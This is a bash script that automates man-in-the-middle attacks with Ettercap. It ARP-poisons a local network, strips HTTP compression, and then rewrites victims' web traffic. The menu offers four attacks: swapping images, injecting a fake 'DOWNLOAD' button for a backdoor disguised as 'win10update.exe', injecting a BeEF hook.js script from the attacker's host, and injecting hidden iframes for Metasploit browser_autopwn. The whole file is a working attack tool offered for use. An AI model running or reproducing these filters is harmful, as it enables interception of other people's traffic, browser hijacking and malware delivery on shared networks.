ettercap-filters-injector-script

1. #!/bin/bash
2. #Replace images
3. clear
4. rm iFrame.ef dwnloadtrojan.ef swapimg.ef beefhook.ef 2&>/dev/null
5. echo -e "Ettercap Filters Compilation"
6. sleep 2
7. echo -e "Checking requirements..."
8. sleep 1
9.   if [[ $(id -u) = 0 ]]; then
10.     echo && echo -e " Checking For ROOT: PASSED"
11.   else
12.     echo && echo -e " Checking For ROOT: FAILED : This Script Needs To Run As ROOT"
13.     echo -e "Will Now Exit"
14.     echo
15.     sleep 1
16.     exit
17.   fi
18. echo -ne "What is your wireless interface? eg wlan0 : "
19. read intface
20. sleep 2
21. echo -e "Starting Web server..."
22. service apache2 start
23. sleep 2
24. echo -e "Done setting"
25. echo
26. sleep 2
27. clear
28. echo -e "Ettercap Filters Compilation"
29. sleep 2
30. echo
31. echo -ne "Choose:
32. 1. Replace images in remote browsers
33. 2. Create Trojan Downloader AD
34. 3. Inject beef hook in remote browsers
35. 4. Inject iFrame
36.  
37. : "
38. read choice
39. # Replace images
40. if [[ $choice == 1 ]]; then
41. echo -ne "An image link is required. The image should be accessible from
42. a web server, either locally or internet in a URL format.
43. eg: http://192.168.0.1/pwn.jpg. Place a picture in the web root (/var/www)
44. and provide its link here.
45. : "
46. read imagelink
47. sleep 1
48. echo "Creating ettercap filter..."
49.  
50. echo "if (ip.proto == TCP && tcp.dst == 80) {
51.      if (search(DATA.data, \"gzip\")) {
52.     replace(\"gzip\", \"    \");    
53.      msg(\"[*] Zapped 'gzip'\\n\");
54.   }
55.   if (search(DATA.data, \"deflate\")) {
56.      replace(\"deflate\", \"       \");
57.      msg(\"[*] Zapped 'deflate'\\n\");
58.   }
59.   if (search(DATA.data, \"gzip,deflate\")) {
60.      replace(\"gzip,deflate\", \"            \");
61.      msg(\"[*] Zapped 'gzip,deflate'\\n\");
62.   }
63.     if (search(DATA.data, \"Accept-Encoding\")) {
64.         replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
65. # NOTE: Replacing string MUST be same size as original string
66.     msg(\"Zapped 'Accept-Encoding'\\n\");
67.     }
68. }
69. if (ip.proto == TCP && tcp.src == 80) {
70.     replace(\"img scr=\", \"img src=\"$imagelink\"\");
71.     replace(\"IMG SRC=\", \"img src=\"$imagelink\"\");
72.     msg(\"Filter Ran.\\n\");
73.     }" > swapimage.filter
74. sleep 1
75. echo -e "Compiling filter.."
76. etterfilter swapimage.filter -o swapimg.ef
77. rm swapimage.filter
78. sleep 2
79. echo -e "Starting attack..."
80. ettercap -i $intface -T -q -F swapimg.ef -M ARP // //
81.  
82. elif [[ $choice == 2 ]]; then
83. #Download Trojan
84. echo -e "Creating backdoor..."
85. echo
86. python crypter.py
87. mv backdoor.exe /var/www/win10update.exe
88. echo Backdoor URL: http://[yourIP]/win10update.exe
89. echo -ne "Place your backdoor and an image in web root (/var/www), then
90. provide their link below.
91. Backdoor URL eg. http://192.168.0.1/meterpreter.exe
92. : "
93. read trojanlink
94. echo -ne "Image URL eg. http://192.168.0.1/image.jpg
95. : "
96. read imagelink
97.  
98. echo "if (ip.proto == TCP && tcp.dst == 80) {
99.            if (search(DATA.data, \"gzip\")) {  
100.      replace(\"gzip\", \"    \");
101.      msg(\"[*] Zapped 'gzip'\\n\");
102.   }
103.   if (search(DATA.data, \"deflate\")) {
104.      replace(\"deflate\", \"       \");
105.      msg(\"[*] Zapped 'deflate'\\n\");
106.   }
107.   if (search(DATA.data, \"gzip,deflate\")) {
108.      replace(\"gzip,deflate\", \"            \");
109.      msg(\"[*] Zapped 'gzip,deflate'\\n\");
110.   }
111.     if (search(DATA.data, \"Accept-Encoding\")) {
112.         replace(\"Accept-Encoding\", \"Accept-Rubbish!\\n\");
113. # NOTE: Replacing string MUST be same size as original string
114.     msg(\"Zapped Accept-Encoding\"\\n\");
115.     }
116. }
117.  
118. if (ip.proto == TCP && tcp.dst == 80) {
119.     if (search(DATA.data, \"<title>\")) {
120.         replace(\"</title>\", \"</title><form action='$trojanlink' method=\"link\"><img src=\"$imagelink\"><INPUT TYPE=submit value=\"DOWNLOAD\"></form><html><body><h10>Just some instructions</h10></body></html>\");
121.         msg(\"HTML Injected\\n\");
122.         }
123.     }" > downloadtrojan.filter
124. echo -e "Compiling filter.."
125. etterfilter downloadtrojan.filter -o dwnloadtrojan.ef
126. rm downloadtrojan.filter
127. sleep 2
128. echo -e "Starting attack..."
129. ettercap -i $intface -T -q -F dwnloadtrojan.ef -M ARP // //
130.  
131. elif [[ $choice == 3 ]]; then
132. # Beef hook
133. echo -ne "You neet to provide IP of the PC running beef.
134. Make sure beef is already started.
135. : "
136. read ip
137. echo "if (ip.proto == TCP && tcp.dst == 80) {
138.        if (search(DATA.data, \"gzip\")) {
139.      replace(\"gzip\", \"    \");
140.      msg(\"[*] Zapped 'gzip'\\n\");
141.   }
142.   if (search(DATA.data, \"deflate\")) {
143.      replace(\"deflate\", \"       \");
144.      msg(\"[*] Zapped 'deflate'\\n\");
145.   }
146.   if (search(DATA.data, \"gzip,deflate\")) {
147.      replace(\"gzip,deflate\", \"            \");
148.      msg(\"[*] Zapped 'gzip,deflate'\\n\");
149.   }
150.     if (search(DATA.data, \"Accept-Encoding\")) {
151.         replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
152. # NOTE: Replacing string MUST be same size as original string
153.     msg(\"Zapped Accept-Encoding\\n\");
154.     }
155. }
156. if (ip.proto == TCP && tcp.dst == 80) {
157.     if (search(DATA.data, \"</head>\")) {
158.         replace(\"</head>\", \"</head><script src=\"http://$ip:3000/hook.js\"></script> \");
159.         msg(\"Code injected. Beef Hooked\\n\");
160.         }
161.     }" > beefhook.filter
162.    
163. echo -e "Compiling filter.."
164. etterfilter beefhook.filter -o beefhook.ef
165. rm beefhook.filter
166. sleep 2
167. echo -e "Starting attack..."
168. ettercap -i $intface -T -q -F beefhook.ef -M ARP // //
169.  
170. elif [[ $choice == 4 ]]; then
171. #Injecting iFrame
172. echo -ne "Injecting iFrame in websites. You need to provide link to your iFrame.
173. eg. http://192.168.0.1/iframe.html here
174. : "
175. read ourIP
176. echo
177. echo -ne "What is your IP?: "
178. read iq
179. sleep 2
180. echo -e "Generating Ettercap filter.."
181. echo "# iFrame.filter --- Ettercap injection filter created for Metasploit's browser_AutoPWN
182. # Generated by iFrame.sh v0.1. g0tmi1k ~ 2011-01-21
183. if (ip.proto == TCP && ip.dst != '$iq') {                 # If traffic using TCP protocol and its not comng to us,
184.   if (search(DATA.data, \"gzip\")) {                                # ...and if it contains an gzip in its header:
185.      replace(\"gzip\", \"    \");                                     # Ask the server not to encode packets - only use plain text ;) *Four spaces to match original string*
186.      msg(\"[*] Zapped 'gzip'\\n\");                                  # Let us know it's been done (=
187.   }
188.   if (search(DATA.data, \"deflate\")) {
189.      replace(\"deflate\", \"       \");
190.      msg(\"[*] Zapped 'deflate'\\n\");
191.   }
192.   if (search(DATA.data, \"gzip,deflate\")) {
193.      replace(\"gzip,deflate\", \"            \");
194.      msg(\"[*] Zapped 'gzip,deflate'\\n\");
195.   }
196.   if (search(DATA.data, \"Accept-Encoding\")) {
197.      replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
198.      msg(\"[*] Zapped 'Accept-Encoding'\\n\");
199.   }
200.  
201.   if (search(DATA.data, \"</title>\")){                                                                                          # Is there something for us to inject into?
202.      replace(\"</title>\",\"</title><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");   # ...Insert our iframe to the webpage!
203.      msg(\"[>] Injecting into (</title>)\\n\");                                                                                   # Let us know we have done it (=
204.   }
205.   if (search(DATA.data, \"</TITLE>\")){
206.      replace(\"</TITLE>\",\"</TITLE><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");
207.      msg(\"[>] Injecting into (</TITLE>)\\n\");
208.   }
209.   if (search(DATA.data, \"body>\")){
210.      replace(\"body>\",\"body><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");
211.      msg(\"[>] Injecting into (body>)\\n\");
212.   }
213.   if (search(DATA.data, \"BODY>\")){
214.      replace(\"BODY>\",\"BODY><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");
215.      msg(\"[>] Injecting into (BODY>)\\n\");
216.   }
217.  
218.   if (search(DATA.data, \"http://$ourIP\")){                  # ...and search data, to test for our 'tweak' ;)
219.      msg(\"[+] Injected Correctly!\\n\");                            # Let us know it's been done done
220.   }
221. }" > iFrame.filter
222. echo -e "Compiling filter.."
223. etterfilter iFrame.filter -o iFrame.ef
224. rm iFrame.filter
225. sleep 2
226. echo -e "Starting attack..."
227. ettercap -i $intface -T -q -F iFrame.ef -M ARP // //
228. else
229. echo "Invalid choice"
230. echo "Exiting.."
231. sleep 2
232. fi